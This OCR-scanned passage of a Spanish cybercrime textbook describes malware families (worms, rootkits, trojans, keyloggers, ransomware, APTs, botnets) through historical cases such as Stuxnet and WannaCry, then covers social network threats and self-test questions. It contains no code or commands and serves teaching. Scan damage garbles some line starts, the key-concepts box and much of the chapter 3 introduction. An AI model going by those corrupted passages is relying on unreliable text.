en Internet para ser usados en ataques.
El propósito de los códigos maliciosos puede ser uno o múltiple, desde
la realización de ataques de denegación de servicio (DDoS), robo de informa-
ción, extorsión o infectar un sistema para que pase a formar parte de una red
zombie, etc.

- 60 -
Capitulo 2. FUNDAMENTOS DE COMPUTADORES Y REDES

tualmente es frecuente la combinación de varios malwares o dotar a


lsmo malware de varias capacidades para lograr el objetivo final de un
• taque.
n general los malwares se clasifican según su forma de actuar y su pro-
111 i de la siguiente forma:

Gusanos y Virus

Los gusanos y los virus se caracterizan por infectar sistemas.


Un virus informático es un tipo de malware que cuando es ejecutado in-
t a otro software del mismo sistema y puede saltar a otros sistemas in-
tándolos a su vez. El virus se replica de un sistema informático a otro de
tf rentes formas, por ejemplo, a través de un correo electrónico o de un dis-
sitivo USB, y establece persistencia, es decir, permanece en el sistema alte-
ndolo. Puede mutar para dificultar su detección y eliminación y suele llevar
una "carga añadida" de otro tipo de malware asociado.
Ej. 2.19: Stoned (Drogado). Un clásico creado en 1987. Fue uno de los pri-
meros virus desarrollados y se cree que fue diseñado por un estudiante univer-
sitario. En 1989 se había extendido ampliamente en Nueva Zelanda y Australia,
y se hizo muy común en todo el mundo a principios de 1990. En uno de cada
8 equipos infectados con la versión origiJrnl aparecía en pantalla frases como
"Su PC está ahora Drogado'" y "legaliza la marihuana". El virus se transmitía al
ordenador cuando este se arrancaba con un disquete contaminado. Se instalaba
como residente en la memoria del ordenador y desde ahí infectaba todos los
disquetes que se utilizaran en el ordenador afectado. Estos, a su vez. infectaban
otros ordenadores en los que se introdujeran.

Los gusanos con frecuencia suelen identificarse erróneamente como vi-


rus pero constituyen un tipo de malware diferente. Es un tipo de malware que
no infecta a otros sistemas o archivos, en el sentido de que normalmente no
establece una persistencia compleja, no necesita alterar los archivos. Funcio-
na autoreplicándose, construyendo y distribuyendo copias de sí mismo, en
el mismo sistema y en otros sistemas. Normalmente los virus son dañinos
para el propio sistema, mientras que los gusanos lo son para la comunicación
en red, excepto cuando el gusano es utilizado para transportar otro tipo de
malware, como por ejemplo un virus. Su mecanismo de propagación está aso-
ciado a mensajes (correo, Facebook, Twitter, ...).
Ej. 2.20: El gusano Morris es un malware que se copiaba de un ordena-
dor mediante una vulnerabilidad existente en la aplicación sendmail (cliente de

- 61 -
Ci bercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

correo electrónico) . En cada máquina intentaba averiguar las contraseñas de


otras computadoras usando una rutina de búsqueda que permutaba los nom-
bres de usuarios conocidos, una lista de las contraseñas más comunes o buscan-
do aleatoriamente. Su forma de propagarse indefinidamente de una máquina a
otra provocó un gigantesco problema de denegación de servicio. El virus Melis-
sa infectaba a documentos de Microsoft 0ffice, una vez infectado se propagaba
enviando copias de sí mismo por correo electrónico.
Ej. 2.21: El gusano W32.Koobface desde 2008 roba datos sensibles
accediendo a las cookies 2 , inyecta adware (publicidad) y redirecciona a
los sitios que ya están infectados. Por lo general, se transmite a través
de las redes sociales Facebook, MySpace o Twitter. Un funcionamiento
típico es el siguiente: el gusano envía un mensaje a través de Facebook
a todos los amigos del usuario infectado para ver por ejemplo un video
interesante. Al hacer click en el enlace del vídeo el usuario es redirigido
a una web maliciosa que le envía a un vídeo falso solicitando que se ins-
tale un códec (programa descodificador) para poder verlo, este códec es
realmente un instalador del gusano.

2. Rootkits, troyanos, puertas traseras (backdoors)

Este tipo de malware se utiliza para el ocultamiento de otros tipos de


malware.
Los Rootkits son software que modifica los sistemas operativos para evi-
tar que tanto estos como los programas antimalware puedan detectar la eje-
cución de otros programas malware. Para ello se sirve de técnicas que enga-
ñan al sistema operativo haciéndole creer que el malware es software lícito o
incluso que son procesos del mismo sistema operativo.
Ej. 2.22: El caso probablemente más famoso de rootkit fue el protagoniza-
do por la empresa Sony BMG Music Entertainment. La compañía secretamente
incluyó en 2005, dentro de la protección anticopia de algunos CD de música, el
software "Extended Copy Protection (XCP) yMediaMax CD-3", que modificaba el
sistema operativo Windows para que no lo pudiera detectar y también resulta-
se indetectable por los programas anti-virus y antí-spyware. Actuaba enviando
información sobre el cliente. Además, abrió la puerta a otros tipos de malware
que pudieron infiltrarse en los sistemas afectados.

2 Las cookies (galletitas en inglés) son pequeños archivos que contienen información en-
viada por un sitio web y almacenada en ellos por los navegadores del usuario. De esta forma los
sitio web pueden consultar la actividad previa realizada por un usuario a través de su navegador.

- 62 -
Capítulo 2. FUNDAMENTOS DE COMPUTAD R.llS Y REDES

Ej. 2.23: TDSS o Alureon es un malware de tipo troyano y rootkit creado


pura interceptar y buscar claves bancarias, usuarios y contraseñas, información
cll• tarjetas de crédito y del sistema de pago por Internet Paypal, números de la
H<'guridad social, que son de especial interés en Estados Unidos, etc.
Ej. 2.24: Whistler Bootkit es un software malicioso tipo rootkit, también
conocido como "Black Internet", diseñado para infiltrarse en un sistema infor-
mático sin ser detectado y conseguir el cont rol completo sobre el mismo. Basa
su ataque en la modificación del registro de arranque del sistema operativo o
"Master Boot Record" permitiendo al atacante convertirlo en parte de una Bot-
11et, entre otras cosas.

Los troyanos son un tipo de software que es capaz de engañar al usuario


ntroduciendo el código dañino en un programa aparentemente inocente o
inocuo como puede ser un juego. Así disfraza u oculta otro tipo de malware
que se activará al ejecutar el troyano. Típicamente su infección produce con-
cuencias no deseadas como el borrado de información, robo de la misma,
ifrado no deseado de la información, instalación de otro software dañino
como, dialers, gusanos, convertir al ordenador en un bot, etc.
Ej. 2.25: Sinowal es un tipo de troyano bancario que puede interceptar y
modificar todo el contenido entre el explorador y cualquier servidor web, así
mismo obtiene la información personal de la víctima como credenciales de ac-
ceso y de los diferentes procesos en ejecución en el sistema infectado.
Ej. 2.26: Zeus es un paquete de malware troyano que se ejecuta en versio-
nes de Microsoft Windows. Se propaga principalmente a través de descargas
drive-by (descarga involuntaria por Internet) y utiliza esquemas ele phishing en
sus ataques.
Se puede utilizar para llevar a cabo muchas tareas maliciosas y delictivas,
a menudo se utiliza para robar información bancaria mediante el registro de
teclas del navegador (a lo que se conoce como Keylogger) y el acaparamiento
de formularios. También se usa para instalar ransomware como Crypt0Locke1:
un malware que cifra los archivos almacenados en discos locales y en unidades
de red, tras lo cual muestra un mensaje en pantalla, en el que se pide un pago o
rescate para descifrar los archivos. Zeus también se ha utilizado para cometer
estafas: se les informa a las víctimas a través de mensajes emergentes, o usando
el símbolo del sistema o el visor de eventos, que tiene un virus y se les reclama
un pago por el soporte técnico para eliminarlo. Diferentes evoluciones de Zeus
reciben disúntos nombres, como por ejemplo KINS.
Ej. 2.27: Emotet es un malware troyano polimórflco, es cleci1~ cambia au-
tomáticamente su código cada cierto tiempo o con acciones determinadas del
dispositivo, haciendo que sea más difícil para los antivirus detectarlo. Anterior-

- 63 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGíA INFORMÁTICA

mente este malware se consideraba de tipo bancario, debido a su comporta-


miento pero hoy en día está integrado con varias funciones maliciosas ya que
consta de varios módulos que descarga de su servidor mediante funciones de
tipo C&C (mando y control) como por ejemplo: módulo de spam, módulo de gu-
sano de red, módulo para la visualización de la contraseña del correo electróni-
co o las almacenadas por el navegador web, etc .. . La primera aparición conocida
tuvo lugar en Alemania, Austria, y Suiza en el año 2014. Una vez que Emotet ha
infectado a un dispositivo, tiene la capacidad de interceptar, registrar, y guardar
todo el tráfico de red saliente del navegador web, para acceder a información
sensible de la víctima como sus cuentas bancarias, datos de contactos ... Emo-
tet puede convertir al sistema anfitrión en parte de la botnet para propagar
el malware a otros equipos desde los cuales realizar ataques de denegación
de servicio DOS (Denial Of Service attacks) en otros sistemas. Al ir asociado a
una estructura basada en mando y control sus capacidades son muy variadas.
El atacante controla el ordenador infectado dándole órdenes o bajando nuevos
módulos para alcanzar sus objetivos.

Las Backdoors o puertas traseras, son un tipo de malware que explota


vulnerabilidades en los procedimientos habituales de autenticación para es-
tablecer conexiones con los sistemas de forma no autorizada y permitir la
entrada en los mismos de atacantes y otros tipos de malware.
Ej. 2.28: Back Orífice y NetBus son los más conocidos y dos de las prime-
ras puertas traseras diseñadas que hasta nuestros días siguen vigentes, aunque
su número se ha reducido dado que la mayoría de los programas antivirus los
detectan.
Back Orífice es un programa ideado para la administración remota de sis-
temas. Permite a un atacante controlar ordenadores con el sistema operativo
Windows desde una localización remota. Está basado en una arquitectura clien-
te-servidor. Los ordenadores atacados están ejecutando un programa servidor
que se manipula remotamente mediante un cliente. El atacante puede realizar
diversas acciones entre las que destaca abrir y cerrar programas, controlar el
CD-ROM, leer y modificar ficheros o borrar parte del disco duro.
Ej. 2.29: NetBus es un malware cuyo propósito es similar al anterior y qu e
consiste en controlar sistemas informáticos Microsoft Windows desde una ubi -
cación remota a través de una red. Fue creado en 1998 y su uso ha sido muy
controvertido por el peligroso potencial que entraña si es utilizado como una
puerta trasera. Su creador afirmó que el programa estaba destinado a ser usado
para bromas, no para irrumpir ilegalmente en los sistemas informáticos. Tradu -
cido del sueco, el nombre significa "NetPrank" (broma en red). Sin embargo, se
utiliza para el registro de las pulsaciones del teclado (Keylogging ), la inyección
de teclas de manera remota (ejecución de comandos), la captura de pantallas,
permitiendo al atacante descargarlas en su ordenador, la ejecución remota de

- 64 -
Capítulo 2. FUNDAMENTOS DE COMPUTAD RESY REDES

aplicaciones, la navegación por las carpetas y archivos de la máquina compro-


metida, o el apagado del sistema entre otras.

Keyloggers y stealers

Los Keyloggers son un tipo de malware que es capaz de monitorizar las


1 aciones de teclas en el teclado memorizándolas en un fichero para paste-
l' !'mente remitirlas a un tercero. Existen variantes que realizan capturas de
tallas o movimientos y pulsaciones de ratón. Se utiliza para la obtención
redenciales de autenticación, datos bancarios o monitorización de con-
rsaciones, entre otros usos.
Ej. 2.30: ZedLog es un keylogger para plataformas Windows, Linux y Mac
que realiza registros de las pulsaciones de teclado y movimientos de ratón, y
captura de pantallas.

Los stealers (ladrones de información) son un malware utilizado para el


' bo de información privada. A diferencia de los keyloggers que almacenan la
información obtenida indiscriminadamente, los stealers buscan, específica-
ente, información de tipo cuentas bancarias, nombres de usuario, contra-
fi.as, cuentas de correo, etc. pero que ya están almacenadas en el sistema,
p ra su envío a un tercero. Son capaces de analizar software ya instalado en
l sistema, como navegadores o gestores de correo, para hacerse con las cre-
denciales e información de uso, entre otros datos.
Ej. 2.31: Infostealer es un software malicioso que busca información ban-
caria en dispositivos de telefonía móvil que funcionan con Android. Es distri-
buido en un paquete de actualización falso llamado "Update_chrome.apk". El
archivo se descarga en el dispositivo después de que se muestre una notifica-
ción informando al usuario sobre una infección e indicando que es necesario
protegerse ante ella. Es muy importante que los usuarios de móviles Android
desconfíen cuando se les solicita cualquier descarga ele un archivo desconocido,
específicamente para la app del navegador Google Chrome. Las aplicaciones de-
berían descargarse de Google Play Sto re.

4. Spyware, adware, hijacking

Estos tipos de malware realizan diferentes funciones, como mostrar


anuncios no solicitados (pop-up), recopilar información privada, redirigir so-
licitudes de páginas e instalar marcadores de teléfono, etc.

- 65 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

El spyware es en general un programa espía que recopila información de


una computadora y después transmite esta información a una entidad exter-
na sin el conocimiento o consentimiento del propietario del computador. Se
suelen autoinstalar en el sistema afectado de forma que se ejecuta cada vez
que se pone en marcha el ordenador y funciona todo el tiempo, controlando
el uso que se hace de Internet y mostrando anuncios relacionados.
Las consecuencias de una infección de spyware moderada o severa, ade-
más de las cuestiones de privacidad, generalmente incluyen una pérdida con-
siderable del rendimiento del sistema (hasta un 50 % en casos extremos),
problemas de estabilidad graves (el ordenador se queda "colgado") y proble-
mas de conexión a Internet.
El adware es un tipo de malware que muestra publicidad no autorizada
al usuario de forma intrusiva en forma de ventanas emergentes (pop-ups).
Ej. 2.32: Gator, también conocido como Gain, es un programa adware que abre
ventanas emergentes de publicidad en el navegador Internet Explorer; basado en las
preferencias del usuario. Se aloja secretamente al instalar otras aplicaciones gratui-
tas, como Kazaa. Otros programas del mismo estilo son n-CASE, KeenValue, etc.

Hijacking es la actividad realizada por un tipo de malware que modifi-


ca la configuración de los navegadores Web estableciendo como páginas de
inicio páginas no deseadas, como por ejemplo páginas cuyo contenido es de
carácter pornográfico. También pueden redirigir a páginas bancarias falsas
con el objeto de realizar ataques de tipo phishing.
Ej. 2.33: Internet Optimizer es un malwal'e que perm ite a sus autores adue-
ñarse de las páginas de error del navegador (por ejemplo, las que aparecen cuando
se trata de entrar a una dirección inexistente) y las redireccionan a las que ellos
controlan. Estas páginas de error en muchas ocasiones presentaban datos confi-
denciales como passwords, cuentas bancarias etc., que aprovechaban los atacantes.

5. Dialers, Ransomware, APTs, PoS malware

Este tipo de malware tiene como objetivo específico la obtención de un


beneficio económico directo.
Los dialers son un tipo de malware que toma el control del módem dial-
up, para realizar llamadas a números de teléfono de tarificación especial, de-
jando la línea abierta y cargando el coste de dicha llamada al usuario infec-
tado. Si bien hoy en día la mayoría de las conexiones a Internet son mediante
fibra óptica y ADSL y no por marcación telefónica por modem, estos progra-

- 66 -
Capitulo 2. FUNDAMENTOS DE COMPUTADOR.ES YREDES

pueden realizar todavía esta configuración en los sistemas que dispon-


n de un módem para conexiones fax. Aunque en los ordenadores han perdi-
ran parte de su utilidad siguen estando vigentes en dispositivos móviles.
Ej. 2.34: TIBS Dialer. Es un marcador telefónico automático. Conecta el PC,
sin que el usuario se dé cuenta, con sitios y servicios pornográficos que no son
gratuitos.

El ransomware conocido también como criptovirus o secuestrador es un


po de malware que tiene la capacidad de cifrar todos o parte de los archivos
1 sistema, dejándolos inaccesibles al legítimo usuario. En algunos casos, el
bjetivo de este tipo de actividad es pedir un rescate económico para obtener
clave de descifrado.
Ej. 2.35: El malware más conocído de este tipo fue Wannac1y. Protagonizó
en 2017 un ataque a nivel mundial originado por el cryptoworrn (gusano) del mis-
mo nombre, contra ordenadores con sistema operativo Microsoft. Cifraba sus da-
tos y exigía pagos de rescate en la criptomoneda Bitcoin. El ataque fue detenido
a los pocos días gracias a los parches de emergencia publicados por Microsort: y
al descubrimiento de un kili switch en el propio malware (dispositivo software de
seguridad para desconectar el ordenador en una situación de emergencia ) que
evitó que los equipos infectados siguieran propagando el malware. Se estima que
el ataque afectó a más de 200.000 ordenadores en unos 150 países.
Ej. 2.36: Cryptolocker es un tipo de ransomware que infecta los equipos a tra-
vés de un troyano. Está dirigido contra ordenadores con Microsoft Windows e im-
pide que las víctimas accedan a sus archivos hasta que paguen un rescate a los cri-
minales. El troyano se propaga mediante adjuntos de correo electrónico, así como
a través una red de bots en los sistemas de compartición de archivos P2P. Se ejecuta
cuando el usuario abre un archivo ZIP, introduciendo la contraseña que se incluye
en el mensaje e intenta abrir el aparente PDF que contiene. CryptoLocker engaña
al usuario ocultando la extensión en el nombre del archivo para que la víctima no
se dé cuenta de que en realidad no se trata de un archivo PDF sino de un archivo
ejecutable con el software malicioso. Una vez activado, el malware cifra ciertos tipos
de archivos almacenados en unidades de red locales, utilizando el sistema de crip-
tografía de clave pública RSA, con una clave privada que se guarda únicamente en
los servidores de control del malware del atacante. Se estima que los creadores de
CryptoLocker obtuvieron millones de dólares en pagos de rescate. En sus primeros
meses de vida, a finales de 2013, ya había infectado más de 235.000 máquinas.

Las APT (advanced persistent threats, en español amenazas persistentes


avanzadas), son un tipo de malware muy sofisticado, muy personalizables y
muy dirigidos al objetivo que se quiere conseguir. Constituyen el peligro más
importante para empresas y administraciones públicas en la actualidad. Los

- 67 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

ataques de este tipo se caracterizan, diferenciándose con ello de otros tipos


de ataques con malware, por ser:
• Avanzados: Los atacantes tienen recursos técnicos, económicos y de inte-
ligencia amplios y avanzados. Normalmente solo al alcance de Estados u
organizaciones criminales poderosas.
• Persistentes: Los ataques se suelen mantener en el tiempo sin ser detectados.
• Dirigidos: son ataques dirigidos contra objetivos muy específicos.
• Constitutivos de una amenaza: Los ataques APT son una amenaza seria
porque están realizados de forma organizada. Resultan difíciles de detectar
por las herramientas de seguridad tradicionales ya que estas están diseñadas
para evitar ataques puntuales que son más previsibles y fáciles de evadir.
Ej. 2.37 : Stuxnet se construyó como un gusano informático para atacar a
sistemas basados en Windows, fue descubierto en junio de 2010 por unos la-
boratorios en Bielorusia. Su objetivo era atacar sistemas SCADA de control y
monitorización de procesos industriales de Siemens, en particular infraestruc-
turas criticas de centrales nucleares. Su sofisticación lo hacía prácticamente in-
detectable. Se considera el primer ejemplo de arma cibernética pues perseguía
la destrucción de las plantas de producción de uranio enriquecido de Irán. Su
auLoria se ha atribuido a los servicios secretos de uno o varios países. Stuxnet
se considera una APT de gran complejidad ya que para su ataque empleo cuatro
vulnerabilidades de día cero del sistema operativo Winclows. Su vector de ata-
que empleaba lápices USB infectados, para luego aprovechando otros agujeros
de seguridad contaminar otros equipos conectados en red. Una vez lograda la
entrada al sistema, Stuxnet empleaba las contraseñas que se establecían por de-
fecto en los equipos para obtener el control. Para completar la operación Stux-
net se firmaba digitalmente con dos certificados auténticos robados a autorida-
des de certificación que usaban como mecanismo de impostura.

El PoS malware es un software malicioso creado de manera específica


para atacar los TPVs, (terminales de puntos de venta) de los comercios.
El uso de miles de tarjetas de crédito y débito convierte a los TPVs en sis-
temas críticos y un objetivo cada vez más deseable para los ciberdelincuentes
por lo sencillo que supone atacar estos dispositivos de manera anónima des-
de Internet y la posibilidad de vender en el "mercado negro" la información
robada. Bares y restaurantes suelen ser objetivos típicos.
Ej. 2.38: Dexter es una de las más potentes familias PoS. Sus actividades de
robo de información no se limitan a las tarjetas. También roba información del
sistema e instala un keylogger.

- 68 -
Capítulo 2. FUNDAMENTOS DE COMPUTADORES YRE DES

Botnets

Botnets o Bots se utilizan para realizar ataques distribuidos. Apare-


de forma masiva a partir del año 2004 incrementándose su presencia
ía enla red.
un tipo de malware diseñado para tomar el control remoto del equipo
do de forma no autorizada y sin conocimiento de su legítimo dueño. El
,¡ tp controlado se denomina zombie y pasa a formar parte de una red de
as infectados denominada botnet. Estas botnet se pueden utilizar para
r ntes objetivos, como ataques DDoS (denegación de servicio), anonima-
' intermediarios, etc.
Los equipos y redes de botnets, son administrados y gestionados como
red distribuida y pueden ser utilizados por el atacante o pueden ser al-
lladas y vendidas para uso de terceros.

, INTERNET Y REDES SOCIALES

Definición y características

Internet no está gestionado por ninguna administración, pero sí necesita


una serie de centros o instituciones que administren los recursos y supervi-
n que todo es correcto, como la Internet Engineering Task Force (IETF): de-
dicada a crear informes sobre cómo debería ser el futuro de la red de Internet
a través de las opiniones de los usuarios.
Una de las formas más populares en el uso de Internet es el de las redes
sociales. Una red social es un lugar en Internet en el cual un grupo de personas
se interrelacionan compartiendo información, generalmente de tipo personal,
con distintos grados de implicación (amistad, parentesco, intereses comu-
nes ... ).
Las redes sociales se basan en un software especializado que integra nu-
merosas funciones individuales como son los blogs, wikis, foros, chats, men-
sajería ... en una misma interfaz y que proporciona la conectividad entre los
diversos usuarios. Permiten a los usuarios generarse un perfil en la red a tra-
vés del cual se hacen públicos datos e información personal que el usuario
proporciona, también permite interactuar con otros usuarios de la red y loca-
lizarlos en esta, en función de sus datos publicados.

- 69 -
Cibercriminalidad.
OAMENTOS DE SEGURJDAD EN TECNOLOGÍA INFORMÁTICA

ociales se caracterizan por:


n redes de relaciones personales, se pueden denominar también comu-
nidades.
• Están formadas por grupos de personas con intereses similares.
• Dentro de la red existe un sentido de pertenencia a un grupo con una cul-
tura común donde se comparten valores, normas ...
• Se utilizan las mismas infraestructuras telemáticas en todas las Redes So-
ciales donde se permiten comunicaciones de uno a todos y de uno a uno.
• Dentro de la red se realizan actividades que propician interacciones entre
las personas integrantes.
• Algunos de los miembros realizan la función de administrador para el
mantenimiento del grupo.
2. Amenazas en redes sociales
Además de la difusión del malware por el intercambio de archivos, en-
laces, etc. que hemos visto en el epígrafe anterior, las redes sociales presen-
tan características que las hacen especialmente propicias para la comisión
de otro tipo de delitos. En muchas ocasiones algunos usuarios de las redes
sociales se aprovechan de la protección que pueden ofrecer estas como el
anonimato o la distancia física para realizar actividades que atentan contra la
intimidad de las personas, su libertad sexual, su honor, su patrimonio, u otros
intereses. Es cierto que muchas de estas agresiones se cometen también fue-
ra del ámbito de Internet, pero estas tecnologías y especialmente su gestión
administrativa y legal actúan como facilitadores de numerosos delitos.
Casi cualquier modalidad delictiva, exceptuando la que implica contacto físi-
co, puede llevarse a cabo en las redes sociales. En los próximos capítulos se desa-
rrollaran con detalle las modalidades delictivas más frecuentes, pero de momento
se adelanta aquí la terminología común para referirse a las más extendidas:
Las amenazas más habituales relacionadas con las redes sociales son las
siguientes:
• Ciberbullying: acoso que se produce entre iguales a través de las redes so-
ciales con agresión psicológica sostenida en el tiempo a través de insultos,
amenazas, chantajes que tienen como ámbito el ciberespacio, en especial
las redes sociales o a través de mensajes electrónicos. Cobra especial re-
levancia este término para definir el acoso realizado por un menor a otro
por medio del uso de las TIC.
• Grooming: es el conjunto de estrategias que una persona adulta desarrolla en
la red social para mediante engaños (que incluyen por lo general la adopción

- 70 -
Capitulo 2. FUNDAMENTOS DE COMPtrrADORES YREDES

de una identidad falsa, de menor de edad) ganarse la confianza de un usuario


menor de edad con el objetivo de obtener concesiones de índole sexual.
Phishing: este término se refiere a la "pesca" de incautos. Por lo general
mediante un mensaje falso -habitualmente se falsifica la identidad del so-
licitante de la infonnación- se consigue que el usuario voluntariamente,
pero desconociendo a quién realmente le está dando su información, pro-
porcione información, como por ejemplo sus claves de acceso a algún
lugar protegido (cuentas bancarias, cuentas de correo, acceso a áreas res-
tringidas, números de tarjetas de crédito, etc.).
• Scam: estafas realizadas a través de Internet, las redes sociales o el correo
electrónico, donde se pide una cantidad de dinero a cambio de falsas ofer-
tas de trabajo, de productos o con el pretexto de falsas donaciones, etc.
Ej. 2.39: Son especialmente conocidas, a pesar de lo cual siguen fun-
cionando, las estafas protagonizadas por organizaciones criminales, como
las famosas estafas del "novio americano" o de "la novia rusa", en las que
los estafadores crean un perfil falso en redes sociales desde el que con-
tactan con personas a las que, tras ganarse su confianza y establecer una
relación sentimental, solicitan dinero con la promesa de un viaje para en-
contrarse con su amado o amada, o cualquier otra excusa.

• Sextorsión: chantaje a través del cual uno de los usuarios de la red utiliza
contenidos de naturaleza sexual relativos a otro usuario para obtener algo
de este a través de la amenaza de publicarlos .
• Snif.fing: técnica para escuchar todo lo que circula por la red, ya se trate
una red local o de ámbito mayor, hasta Internet. Consiste en capturar y
almacenar mediante un malware espía toda la información que circula por
la red como contraseñas, correos electrónicos, etc., para su posterior aná-
Lisis con finalidades ilícitas.
• A las anteriores podemos añadir otro tipo de amenazas referidas a la crea-
ción de estados de opinión mediante la manipulación, como la que se con-
sigue por ejemplo con la introducción de noticias falsas (fake news), que
son replicadas rápidamente por el resto de los usuarios sin mayor compro-
bación, e incluso, a veces, por bots, que usan perfiles falsos tras los cuales
no hay realmente un usuario.
• Las redes sociales, como medio privilegiado de intercambio de infonnación
y como creadoras de una identidad de grupo, son con frecuencia también
utilizadas para la difusión de mensajes ilícitos y para la captación de adep-
tos a causas igualmente ilícitas, como es el caso de la difusión de mensajes
ten-oristas, o de contenidos racistas, xenófobos, etc. (delitos de odio).

- 71 -
Cibercriminalidad.
Prlm ra parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

CONCEPTOS CLAVE
:,. 1& ,., ~

~ : P ~. ,: ., 0, \ , ~ _ / ;r ¿ , o.A. ~ • :k. : _: , l .
. · .Eleméntos hardware crfticós en seguridad: e} arrangue del,.9rdenad,9r, el
i:, mént9s sdftware ;é:r:fticos' en -segurídad: los :gis~emás operativo's, Pr,otcicolo TCP

. IP, su~éar~s y;funciones, dir~ccion~mientos1m~lware, sus ti.pus ycaracterísticas

EJERCICIOS DE AUTOEVALUACIÓN
l. Valorar una vulnerabilidad de día cero en el firmware o en la BIOS-CMOS.
¿Quién es responsable de la vulnerabilidad? ¿Puede deberse a un problema de
configuración del Sistema Operativo? ¿Puede responsabilizarse a los técnicos
de mantenimiento de la red?
2. Hemos adquirido una cámara para vigilancia de bebés que tiene conexión Wifi.
Estamos preocupados por si nos piratean la imagen ya que el uso será en el
domicilio, la cámara en el dormitorio enfocando la cuna y la pantalla en donde
estemos. ¿Tenemos razones para tomar precauciones? ¿Qué podemos hacer?
3. En una universidad se ha detectado un ataque y al analizarlo los administrado-
res de red indican que se ha realizado desde un equipo portátil indicando su IP
privada identificando a un estudiante. ¿Es esto posible? El estudiante alega que
su IP privada es secreta y que nadie puede conocerla. Además alguien ha tenido
que entrar en su ordenador para verla vulnerando todos sus derechos.¿ Tiene el
estudiante argumentos?
4. Se ha atacado a mi empresa. No tengo acceso a los ordenadores porque han
quedado todos bloqueados, pero si tengo acceso a Internet. ¿Puedo conseguir
información sin acudir al proveedor de servicios?
5. Mi hijo me dice que quiere jugar online con sus amigos utilizando su consola,
pero que no se conecta a Internet. Llamo al IPS y me dicen que hay que abrir
puertos y configurar la NAT para la consola específica. Lo hacen ellos y la conso-
la funciona. ¿Puedo quedarme tranquilo?
6. Al finalizar la compra en la web de unos conocidos almacenes y cerrar la sesión
me aparece una página web en la que me indican que he sido premiado con un
regalo de 100 euros. Para ingresarlo en mi tarjeta solicitan que introduzca to-
dos los datos incluido el CCV. ¿Es seguro?
7. Recibo un mensaje de mi proveedor de servicios de Internet en el que me indi-
can que por seguridad debo cambiar la clave y me facilitan la dirección:
http://miIPS/cam biodeclave/page?_pageid= 13,3 82794&_dad=portal&_
schema=PORT
¿Debo hacerlo?

- 72 -
Capítulo 2. FUNDAMENTOS DE COMPUTADORES YREDES

MI hija, con 17 años, se queja con frecuencia de que la batería de su móvil dura
·o. Le cambiamos la batería, pero tampoco parece durar mucho más. ¿Puede
berse a alguna causa que no sea la batería?
11 na compañera de trabajo tiene una pantalla para videoconferencias en su des-
cho y la enciende solo para ello. Al ordenador le ha puesto cinta en la cámara
por si acaso la atacan mientras está encendido. Con la pantalla se siente segura
porque cuando está apagada no la pueden atacar, ¿lo está?
l 11 n un hotel de USA me encuentro un espejo muy Smart, sí enseño un traje a una
webcam que hay en él y me pongo delante me enseña en el espejo mí imagen
·on el traje puesto. ¿Es seguro?

- 73 -
Segunda parte:
Aspectos penales y
criIDinológicos
de la criIDinalidad
relacionada con las TIC.
Cuestiones generales
Capítulo 3.
Particularidades de la criminalidad
relacionada con las TIC
ULO

n 111tt• t •rcer .c;apftajo se•realiza una int;od\Ícción a l?s prob


en la clbercrüninalidad. En particular ana}!zatemos el concepto
<'r mlnologfa y las prir,tcipales teórias crimQloliJ~icás á.plicadas _a.{"
minalidad. La propia ev0Jucí9n·de la ciber~riminalidad·comporta la. e .
· protagonistas fündanÍ.e.rúales, los c~bér e · cú ' s y las·cit¡t · .
n~s'físicas y- jur"ídicasi D.e este moµo, en este cap tulo ana.l:,iza,re
.. ari~ades aplicables a' estas categqría~. teniendo en cueti-ta las dif .
cías e:xiste:htes entr~ ellas y fas que acompaflan ' criminales y v.ictj;m~.s eµ el
múnño fisl~o , éóñ · · · ·. · · omprénd!;!J,'J L r mcuencia de un¡i ma-
g· · · más que ambas figi.mis, (dber}delincuen-
\i s ·c;_pntorn9s definitorios Y.tiá1r'suf-rido .u n
me e fep.ómeno criminal tradicionJi-11 a pesar de
. a, ºJ:>e; . de los 'rliveles más elevados d,e cifra ne
de la Crimmo og a. m me:nt~;- .edicaremos -cyp. apárt~élo ¡¡'14a p.é a.d
prueba electrónica, pri.neip:3Levidencia enloi,; rocesos pe · · cia
la
los cibercrímene!i, estudiada por inform t1ca orense. te ípo
logía y regulación en el D~i:ecllió proeesá.l,;pena~ así éom:° a s¿1 e~peci~ pr,oble
mática en materia de injerencja en,lbs derechos ~ndamentales de los.investiga- . e
dos y su valoración por p'arie,;&e
, ·~·
la autoridad judicial.~·
,;
"
INTRODUCCIÓN: LA CRIMINOLOGÍA Y EL CIBERCRIMEN

l. Cibercriminología

La Criminología, entre una de las conceptualizaciones posibles, puede


er definida como la ciencia empírica, de carácter inter y multidisciplinar, ho-
llstica del fenómeno criminal. Asumimos que, cuando se pretende hablar de
conocimiento "holístico" del objeto de estudio de una ciencia, se va demasia-
do lejos. No obstante, no nos referimos a la omnisciencia de la Criminología
en relación con su objeto de estudio, sino con la aspiración de la Criminología
de estudiar y conocer cada realidad atinente al crimen, al delincuente, la víc-
tima (ahora objeto de la Victimología, como ciencia autónoma), su preven-
ción, control y tratamiento de forma interrelacionada y como un todo distinto
de la suma de las partes que lo componen.
El estudio del fenómeno de la cibercriminalidad corresponde a la deno-
minada parte especial de la ciencia criminológica, donde se ubican las llama-
das "criminologías específicas" o "criminologías alternativas" (FRAN~A, 2018),
esto es, el estudio de una determinada sección de la realidad y su relación con
la criminalidad, las tipologías delictivas, etc. Se trata de especializaciones por
razón de la materia dentro del objeto de estudio de la Criminología.
El término cibercriminología o criminología informática es relativamente
reciente y no está exento de cierta polémica doctrinal respecto al alcance de su
significado. Son varios los autores que han tratado de definir esta especialización:
El término original se atribuye a JAISHANKAR, "padre fundador" de la ci-
bercriminología, quien lo considera, con carácter general, un nuevo campo

- 79 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

académico, una subdisciplina de la Criminología, si bien posteriormente se


referirá a la misma como una materia multidisciplinar que abarca diversos
campos, tales como la Criminología, la Victimología, la Sociología, la Ciencia
de Internet y las Ciencias de la computación. En sus publicaciones ha definido
la cibercriminología como el estudio de la causa de los delitos que ocurren en
el ciberespacio y su impacto en el espacio físico. En esencia, la cibercrimino-
